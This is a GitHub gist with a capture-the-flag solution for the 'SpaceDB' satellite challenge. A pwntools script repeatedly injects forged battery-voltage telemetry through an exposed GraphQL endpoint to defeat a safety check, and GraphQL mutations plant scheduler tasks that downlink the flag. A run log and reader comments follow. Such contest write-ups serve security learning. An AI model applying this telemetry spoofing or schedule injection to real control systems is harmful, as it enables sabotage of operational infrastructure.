Last active
June 1, 2020 07:03
-
-
Save darkarnium/4ae78a4f445c7a9c12beb36c0589e7b8 to your computer and use it in GitHub Desktop.
spacedb
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (ctf) [darkarnium::Callisto SpaceDB][0]$ python3 -i flagger.py | |
| [x] Opening connection to spacedb.satellitesabove.me on port 5062 | |
| [x] Opening connection to spacedb.satellitesabove.me on port 5062: Trying 18.191.160.21 | |
| [+] Opening connection to spacedb.satellitesabove.me on port 5062: Done | |
| [*] Sending ticket | |
| [*] Waiting for Telemetry service endpoint | |
| [*] 18.191.160.21:19587/tel/graphiql | |
| [*] Starting voltage fix-up thread | |
| [*] Waiting for Scheduler service to start | |
| [!] VIDIODE fixed to 7.0 (from 6.47) for 1590260897.99999 | |
| [*] 18.191.160.21:19587/sch/graphiql | |
| [!] VIDIODE fixed to 7.0 (from 6.473900264) for 1590260935.99999 | |
| [*] update_tel info: Updating reaction_wheel telemetry. | |
| [*] update_tel info: Updating gps telemetry. | |
| [*] update_tel info: Updating eps telemetry. | |
| [*] critical-tel-check info: Detected new telemetry values. | |
| [*] critical-tel-check info: Checking recently inserted telemetry values. | |
| [*] critical-tel-check info: Checking gps subsystem | |
| [*] critical-tel-check info: gps subsystem: OK | |
| [*] critical-tel-check info: reaction_wheel telemetry check. | |
| [*] critical-tel-check info: reaction_wheel subsystem: OK. | |
| [*] critical-tel-check info: eps telemetry check. | |
| [*] critical-tel-check warn: Solar panel voltage low | |
| [*] critical-tel-check info: eps subsystem: OK | |
| [*] critical-tel-check info: System: OK. | |
| [*] critical-tel-check info: Position: GROUNDPOINT | |
| [!] VIDIODE fixed to 7.0 (from 6.477303053) for 1590260995.99999 | |
| [*] update_tel info: Updating reaction_wheel telemetry. | |
| [*] update_tel info: Updating gps telemetry. | |
| [*] update_tel info: Updating eps telemetry. | |
| [*] critical-tel-check info: Detected new telemetry values. | |
| [*] critical-tel-check info: Checking recently inserted telemetry values. | |
| [*] critical-tel-check info: Checking gps subsystem | |
| [*] critical-tel-check info: gps subsystem: OK | |
| [*] critical-tel-check info: reaction_wheel telemetry check. | |
| [*] critical-tel-check info: reaction_wheel subsystem: OK. | |
| [*] critical-tel-check info: eps telemetry check. | |
| [*] critical-tel-check warn: VIDIODE battery voltage too low. | |
| [*] critical-tel-check warn: Solar panel voltage low | |
| [*] critical-tel-check warn: System CRITICAL. | |
| [*] critical-tel-check info: Position: GROUNDPOINT | |
| [*] critical-tel-check warn: Stopping non-essential services. | |
| [*] critical-tel-check warn: Debug telemetry database running at: 18.191.160.21:19587/tel/graphiql | |
| [*] critical-tel-check info: Closing scheduler service. | |
| [!] VIDIODE fixed to 7.0 (from 6.477303053) for 1590260995.99999 | |
| [*] critical-tel-check info: Detected new telemetry values. | |
| [*] critical-tel-check info: Checking recently inserted telemetry values. | |
| [*] critical-tel-check info: Checking gps subsystem | |
| [*] critical-tel-check info: gps subsystem: OK | |
| [*] critical-tel-check info: reaction_wheel telemetry check. | |
| [*] critical-tel-check info: reaction_wheel subsystem: OK. | |
| [*] critical-tel-check info: eps telemetry check. | |
| [*] critical-tel-check warn: Solar panel voltage low | |
| [*] critical-tel-check info: eps subsystem: OK | |
| [*] critical-tel-check info: Position: GROUNDPOINT | |
| [*] critical-tel-check warn: System: OK. Resuming normal operations. | |
| [*] critical-tel-check info: Scheduler service comms started successfully at: 18.191.160.21:19587/sch/graphiql | |
| [*] Low_power mode enabled. | |
| [*] Timetraveling. | |
| [*] Transmission mode enabled. | |
| [*] Pointing to ground. | |
| [*] Transmitting... | |
| [*] ----- Downlinking ----- | |
| [*] Recieved flag. | |
| [*] flag{foxtrot47377romeo:GBN8mWXevsmDq8mApvRvJlN5hMCcCY7bFp4QMZ3XyTxEcFv5F3Ob0Ld4HDSs08-wZWtZf84bwzjD2TulrB_-0xw} | |
| [*] Downlink disabled. | |
| [*] Adjusting to sunpoint... | |
| [*] Sunpoint: TRUE | |
| [*] Goodbye |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| import os | |
| import glob | |
| import time | |
| import math | |
| import requests | |
| import threading | |
| from pwn import * | |
| TICKET = 'ticket{foxtrot47377romeo:GOQrsg86Lzk7zuEyjS8MoCoBXYFsoTH8LKdCocfTduVhDXIczFfB5GU_wdR3RmRuSg}' | |
| USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0' | |
| def do_query(uri, query): | |
| endpoint = 'http://{0}/graphql'.format(uri.split('/')[0]) | |
| r = requests.post( | |
| endpoint, | |
| json={ | |
| 'query': query, | |
| 'operationName': None, | |
| 'variables': None, | |
| }, | |
| headers={ | |
| 'Content-Type': 'application/json', | |
| 'Accept': 'application/json', | |
| 'Origin': endpoint.replace('/graphql', ''), | |
| 'Referer': "http://{0}".format(uri), | |
| 'User-Agent': USER_AGENT, | |
| } | |
| ) | |
| return r.json() | |
| def fix_voltage(uri): | |
| # Watch and replace voltage readings. | |
| while True: | |
| try: | |
| updates = [ | |
| { | |
| "parameter": "VIDIODE", | |
| "new_value": "7.0", | |
| }, | |
| ] | |
| for update in updates: | |
| # Get the latest telemetry value for the given parameter. | |
| telemetry = do_query( | |
| uri, | |
| '{{telemetry(parameter: "{0}", limit: 1){{value timestamp}}}}'.format( | |
| update['parameter'] | |
| ) | |
| ) | |
| # Update with our specified value - if not already set. | |
| element = telemetry['data']['telemetry'][0] | |
| timestamp = '{0}.{1}'.format( | |
| str(math.floor(element['timestamp'])), | |
| '99999' | |
| ) | |
| if element['value'] != update['new_value']: | |
| log.warning( | |
| '{0} fixed to {1} (from {3}) for {2}'.format( | |
| update['parameter'], | |
| update['new_value'], | |
| timestamp, | |
| element['value'] | |
| ) | |
| ) | |
| do_query( | |
| uri, | |
| 'mutation {{insert(timestamp:{0},subsystem:"eps",parameter:"{1}",value: "{2}"){{success errors}}}}'.format( | |
| timestamp, | |
| update['parameter'], | |
| update['new_value'] | |
| ) | |
| ) | |
| time.sleep(1) | |
| except Exception: | |
| pass | |
| if __name__ == '__main__': | |
| sock = remote('spacedb.satellitesabove.me', 5062) | |
| # Send ticket. | |
| sock.recvuntil('Ticket please:') | |
| log.info('Sending ticket') | |
| sock.sendline(str(TICKET)) | |
| # Process out GraphQL endpoint. | |
| log.info('Waiting for Telemetry service endpoint') | |
| sock.recvuntil('telemetry database running at:') | |
| uri = sock.recvline().strip().decode('utf-8') | |
| log.info(uri) | |
| # Run a thread to constantly fix the voltage. | |
| log.info('Starting voltage fix-up thread') | |
| voltage_thread = threading.Thread(target=fix_voltage, args=(uri,)) | |
| voltage_thread.start() | |
| # # Process out GraphQL endpoint. | |
| log.info('Waiting for Scheduler service to start') | |
| sock.recvuntil('Scheduler service comms started successfully at:') | |
| uri = sock.recvline().strip().decode('utf-8') | |
| log.info(uri) | |
| # DEBUG. | |
| while True: | |
| line = sock.recvline().strip().decode('utf-8') | |
| if line: | |
| log.info(line) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mutation{ | |
| importRawTaskList( | |
| name:"nominal-op", | |
| mode:"low_power", | |
| json:"{\"tasks\":[{\"delay\":null,\"time\":\"2020-05-23 19:59:10\",\"description\":\"Orient antenna to ground.\",\"period\":null,\"app\":{\"name\":\"groundpoint\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:57:28\",\"description\":\"Power-up downlink antenna.\",\"period\":null,\"app\":{\"name\":\"enable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:57:29\",\"description\":\"Flag\",\"period\":null,\"app\":{\"name\":\"request_flag_telemetry\",\"args\":[\"--win\"],\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:57:33\",\"description\":\"Power-down downlink antenna.\",\"period\":null,\"app\":{\"name\":\"disable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:30\",\"description\":\"Orient solar panels at sun.\",\"period\":null,\"app\":{\"name\":\"sunpoint\",\"args\":null,\"config\":null}}]}" | |
| ) { | |
| success: success, | |
| errors: errors | |
| } | |
| } | |
| mutation{ | |
| importRawTaskList( | |
| name:"nominal-op", | |
| mode:"transmission", | |
| json:"{\"tasks\":[{\"delay\":null,\"time\":\"2020-05-23 19:59:20\",\"description\":\"Orient antenna to ground.\",\"period\":null,\"app\":{\"name\":\"groundpoint\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:40\",\"description\":\"Power-up downlink antenna.\",\"period\":null,\"app\":{\"name\":\"enable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:42\",\"description\":\"Flag\",\"period\":null,\"app\":{\"name\":\"request_flag_telemetry\",\"args\":[\"--win\"],\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:50\",\"description\":\"Power-down downlink antenna.\",\"period\":null,\"app\":{\"name\":\"disable_downlink\",\"args\":null,\"config\":null}},{\"delay\":null,\"time\":\"2020-05-23 19:59:52\",\"description\":\"Orient solar panels at sun.\",\"period\":null,\"app\":{\"name\":\"sunpoint\",\"args\":null,\"config\":null}}]}" | |
| ) { | |
| success: success, | |
| errors: errors | |
| } | |
| } | |
| mutation{ | |
| activateMode(name: "low_power") { | |
| success: success, | |
| errors: errors | |
| } | |
| } |
How did you get the parameters for importRawTaskList? (e.g. groundpoint, enable_downlink, request_flag_telemetry)
I was not able to retrieve the damn app list lol
How did you get the parameters for importRawTaskList? (e.g. groundpoint, enable_downlink, request_flag_telemetry)
I was not able to retrieve the damn app list lol
When you got into the scheduler you were able to query the tasklist for each mode.
Yep! The following GQL dumped a list of all available modes and their tasks:
{availableModes {name, path, schedule{filename,path,tasks {
delay
time
description
period
app {
name
args
config
}
}}}}
The the result looked something like this:
{
"data": {
"availableModes": [
{
"name": "low_power",
"path": "/challenge/target/release/schedules/low_power",
"schedule": [
{
"filename": "nominal-op",
"path": "/challenge/target/release/schedules/low_power/nominal-op.json",
"tasks": [
{
"delay": "5s",
"time": null,
"description": "Charge battery until ready for transmission.",
"period": null,
"app": {
"name": "low_power",
"args": null,
"config": null
}
},
{
"delay": null,
"time": "2020-05-23 15:43:23",
"description": "Switch into transmission mode.",
"period": null,
"app": {
"name": "activate_transmission_mode",
"args": null,
"config": null
}
}
]
}
]
},
{
"name": "safe",
"path": "/challenge/target/release/schedules/safe",
"schedule": []
},
{
"name": "station-keeping",
"path": "/challenge/target/release/schedules/station-keeping",
"schedule": [
{
"filename": "nominal-op",
"path": "/challenge/target/release/schedules/station-keeping/nominal-op.json",
"tasks": [
{
"delay": "35s",
"time": null,
"description": "Update system telemetry",
"period": "1m",
"app": {
"name": "update_tel",
"args": null,
"config": null
}
},
{
"delay": "5s",
"time": null,
"description": "Trigger safemode on critical telemetry values",
"period": "5s",
"app": {
"name": "critical_tel_check",
"args": null,
"config": null
}
},
{
"delay": "0s",
"time": null,
"description": "Prints flag to log",
"period": null,
"app": {
"name": "request_flag_telemetry",
"args": null,
"config": null
}
}
]
}
]
},
{
"name": "transmission",
"path": "/challenge/target/release/schedules/transmission",
"schedule": [
{
"filename": "nominal-op",
"path": "/challenge/target/release/schedules/transmission/nominal-op.json",
"tasks": [
{
"delay": null,
"time": "2020-05-23 15:43:33",
"description": "Orient antenna to ground.",
"period": null,
"app": {
"name": "groundpoint",
"args": null,
"config": null
}
},
{
"delay": null,
"time": "2020-05-23 15:43:53",
"description": "Power-up downlink antenna.",
"period": null,
"app": {
"name": "enable_downlink",
"args": null,
"config": null
}
},
{
"delay": null,
"time": "2020-05-23 15:43:58",
"description": "Power-down downlink antenna.",
"period": null,
"app": {
"name": "disable_downlink",
"args": null,
"config": null
}
},
{
"delay": null,
"time": "2020-05-23 15:44:03",
"description": "Orient solar panels at sun.",
"period": null,
"app": {
"name": "sunpoint",
"args": null,
"config": null
}
}
]
}
]
}
]
}
}
Great writeup, thank you! :) Should've read filenames more carefully lol, had the exact same idea as you but could not figure out what to put in the name parameter for importRawTask.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
The
payloadsshould be executed via GraphiQL once the scheduler is started. This could have been added to theflagger.pyscript, but y'know.